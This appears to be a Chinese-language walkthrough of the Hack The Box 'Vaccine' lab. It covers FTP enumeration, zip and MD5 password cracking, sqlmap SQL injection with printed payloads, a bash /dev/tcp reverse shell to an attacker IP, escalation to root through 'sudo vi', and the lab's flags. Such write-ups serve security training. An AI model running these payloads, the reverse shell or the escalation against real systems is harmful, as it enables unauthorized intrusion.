# Task 1


Q:Besides SSH and HTTP, what other service is hosted on this box?

nmap 直接扫描

┌──(root💀kali)-[~/桌面]
└─# nmap -sV -Pn 10.129.75.167
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 10:01 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.129.75.167
Host is up (0.70s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.77 seconds

其中的 RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
是因为我的网络不好而产生的报错,超时平均方差比较大。

参考资料:


A: ftp

# Task 2

Q:This service can be configured to allow login with any password for specific username. What is that username?

A:anonymous

# Task 3

Q:What is the name of the file downloaded over this service?

连接到 FTP 上

┌──(root💀kali)-[~/桌面]
└─# ftp 10.129.75.167
Connected to 10.129.75.167.
220 (vsFTPd 3.0.3)
Name (10.129.75.167:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.27 secs (9.2379 kB/s)

可以看到里面有个 backup.zip 文件

A:backup.zip

# Task 4

Q:What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?

john the rapper
是一个用于破解各种密码的软件。

首先需要使用 zip2john 生成 hash


然后进行破解

┌──(root💀kali)-[~/桌面]
└─# zip2john backup.zip > hash
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
                                                                             
┌──(root💀kali)-[~/桌面]
└─# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
741852963        (backup.zip)     
1g 0:00:00:00 DONE 2/3 (2022-05-08 10:12) 6.250g/s 531356p/s 531356c/s 531356C/s 123456..faithfaith
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

密码:741852963

A: 741852963

# Task 5

Q:What is the password for the admin user on the website?

解压压缩包

┌──(root💀kali)-[~/桌面]
└─# unzip backup.zip 
Archive:  backup.zip
[backup.zip] index.php password: 
  inflating: index.php               
  inflating: style.css

查看 index.php

能够看到密码的哈希值 2cb42f8734ea607eefed3b70af13bbd3

<!DOCTYPE html>
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }
?>

在线搜索 md5


得到结果: qwerty789


A: qwerty789

# Task 6

Q:What option can be passed to sqlmap to try to get command execution via the sql injection?

用上面的账号密码登录进去发现是一个查询,手动检测发现有注入

http://10.129.75.167/dashboard.php?search=%27AND%201=1%20--
http://10.129.75.167/dashboard.php?search=%27AND%202=1%20--

直接用 sqlmap 跑咯

由于是管理员权限。那么跑的时候一定要添加 cookie 信息
我的是:```PHPSESSID=462ehhjmskjo99v8ld1m3d470b


![image.png](./Vaccine.assert/1651977532500-8f192941-bb99-4697-b393-3369c6e46bf2.png)

获得shell:

```cpp
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u 10.129.75.167/dashboard.php?search=1 --cookie=PHPSESSID=462ehhjmskjo99v8ld1m3d470b --risk=3 --level=3 --random-agent --os-shell
        ___
       __H__                                                                 
 ___ ___[.]_____ ___ ___  {1.5.11#stable}                                    
|_ -| . ["]     | .'| . |                                                    
|___|_  [)]_|_|_|__,|  _|                                                    
      |_|V...       |_|   https://sqlmap.org                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:40:20 /2022-05-08/

[10:40:20] [INFO] fetched random HTTP User-Agent header value 'Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00' from file '/usr/share/sqlmap/data/txt/user-agents.txt'                                                  
[10:40:20] [INFO] testing connection to the target URL
[10:40:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:40:22] [INFO] testing if the target URL content is stable
[10:40:23] [INFO] target URL content is stable
[10:40:23] [INFO] testing if GET parameter 'search' is dynamic
[10:40:24] [WARNING] GET parameter 'search' does not appear to be dynamic
[10:40:25] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[10:40:26] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[10:40:26] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (3) value? [Y/n] n
[10:40:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:41:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[10:41:38] [INFO] GET parameter 'search' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="SUV")                 
[10:41:38] [INFO] testing 'Generic inline queries'
[10:41:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'                                                                           
[10:41:40] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable                                              
[10:41:40] [INFO] testing 'PostgreSQL inline queries'
[10:41:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:41:53] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable                                            
[10:41:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:42:05] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable                                                 
[10:42:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:42:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:42:06] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:42:07] [WARNING] reflective value(s) found and filtering out
[10:42:12] [INFO] target URL appears to have 5 columns in query
[10:42:15] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable                                                     
[10:42:15] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: search=-7712' OR 5759=5759-- iRnE

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=1' AND 8843=CAST((CHR(113)||CHR(98)||CHR(118)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (8843=8843) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(113)||CHR(112)||CHR(113)) AS NUMERIC)-- XdGz

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=1';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=1' AND 1588=(SELECT 1588 FROM PG_SLEEP(5))-- kJxc

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,NULL,(CHR(113)||CHR(98)||CHR(118)||CHR(107)||CHR(113))||(CHR(102)||CHR(75)||CHR(100)||CHR(90)||CHR(89)||CHR(117)||CHR(66)||CHR(81)||CHR(97)||CHR(84)||CHR(101)||CHR(102)||CHR(110)||CHR(108)||CHR(122)||CHR(81)||CHR(102)||CHR(108)||CHR(106)||CHR(108)||CHR(65)||CHR(86)||CHR(77)||CHR(86)||CHR(71)||CHR(72)||CHR(105)||CHR(72)||CHR(99)||CHR(100)||CHR(101)||CHR(107)||CHR(88)||CHR(79)||CHR(114)||CHR(66)||CHR(81)||CHR(75)||CHR(74)||CHR(114))||(CHR(113)||CHR(120)||CHR(113)||CHR(112)||CHR(113))-- GBDO
---
[10:42:58] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[10:43:07] [INFO] fingerprinting the back-end DBMS operating system
[10:43:11] [INFO] the back-end DBMS operating system is Linux
[10:43:13] [INFO] testing if current user is DBA
[10:43:17] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[10:43:17] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> 

A: --os-shell

# Task 7

Q:What program can the postgres user run as root using sudo?

root flag 有过程

A:vi

# Flag

在前面拿到了 os-shell 之后我们开启 nc 监听

┌──(root💀kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...

os-shell 反弹链接

os-shell> bash -c "bash -i >& /dev/tcp/10.10.16.86/4444 0>&1"

bash -c 代表用 bash 来执行一段命令,参数 c 后面加上一段需要执行的命令

bash -i 代表建立一个交互式的 shell

这个我们经常见到,例如我们常用 echo “hello world”>hello.txt,这个代表将将字符串写入一个文件

那么 &> 又代表什么呢?我们先来了解一下 shell 中的三个文件描述符(file descriptor)。

  • 0 是一个文件描述符,表示标准输入(stdin),即在 shell 中我们输入的字符。
  • 1 是一个文件描述符,表示标准输出(stdout),即在 shell 中系统输出的字符。
  • 2 是一个文件描述符,表示标准错误(stderr),即 shell 中报错输出的字符。​
    在 > 前面的 & 代表文件描述符 1 和 2,也就是标准输出和标准错误信息,这里是把交互式 bash 中的标准输出信息和报错信息都写入 /dev/tcp/10.10.16.86/4444
    文件中。

    这里的 /dev/tcp
    是一个设备文件,并不是一个真正的文本文件。它的作用是建立 tcp 连接,在这里是与 10.10.16.86 的 4444 端口建立连接。

    0>&1 这代表 bash 中的标准输入信息写入文件管道 1(stdout),这里的 & 的意思与前面的不同,这里 & 与 1 是一个整体,&1 代表文件描述符 1(stdout)。而前面已经通过命令 &> 将文件管道 1(stdout)的数据写入了 /dev/tcp,所以这里的文件管道 0 的数据也会跟随文件管道 1 写入 /dev/tcp。这样就将 bash -i 中的全部数据传输到了本地监听程序中,也就建立一个 shell。


nc 就上线了

# user flag

postgres@vaccine:/var/lib/postgresql/11/main$ cd ~
cd ~
postgres@vaccine:/var/lib/postgresql$ ls
ls
11
user.txt
postgres@vaccine:/var/lib/postgresql$ cat user.txt
cat user.txt
ec9b13ca4d6229cd5cc1e09980965bf7

FLAG:```ec9b13ca4d6229cd5cc1e09980965bf7


​
# root flag

去网站根目录翻一翻
​

```cpp
postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html
cd /var/www/html
postgres@vaccine:/var/www/html$ ls
ls
bg.png
dashboard.css
dashboard.js
dashboard.php
index.php
license.txt
style.css
postgres@vaccine:/var/www/html$ cat dashboard.php
cat dashboard.php

得到数据库账号密码

<?php
        session_start();
        if($_SESSION['login'] !== "true") {
          header("Location: index.php");
          die();
        }
        try {
          $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
        }

尝试下 ssh 登录看看,不一定登的上去

┌──(root💀kali)-[~/桌面]
└─# ssh postgres@10.129.75.167
The authenticity of host '10.129.75.167 (10.129.75.167)' can't be established.
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.75.167' (ED25519) to the list of known hosts.
postgres@10.129.75.167's password: 
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)

进去了,那我们想办法提升管理员权限咯

查看一下能使用的高级权限命令

postgres@vaccine:~$ sudo -l
Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET",
    env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

可以看到能以 root 身份使用 vi 打开 /etc/postgresql/11/main/pg_hba.conf
这个文件

而且 vi 可以直接执行命令的,那么我们用 vi 打开这个文件,然后用命令提权咯

postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
//vi 中命令:!/bin/bash
root@vaccine:/var/lib/postgresql#

然后我们去找 flag 啦

root@vaccine:/var/lib/postgresql# cd ~
root@vaccine:~# ls
pg_hba.conf  root.txt  snap
root@vaccine:~# cat root.txt 
dd6e058e814260bc70e9bbdef2715849

flag: dd6e058e814260bc70e9bbdef2715849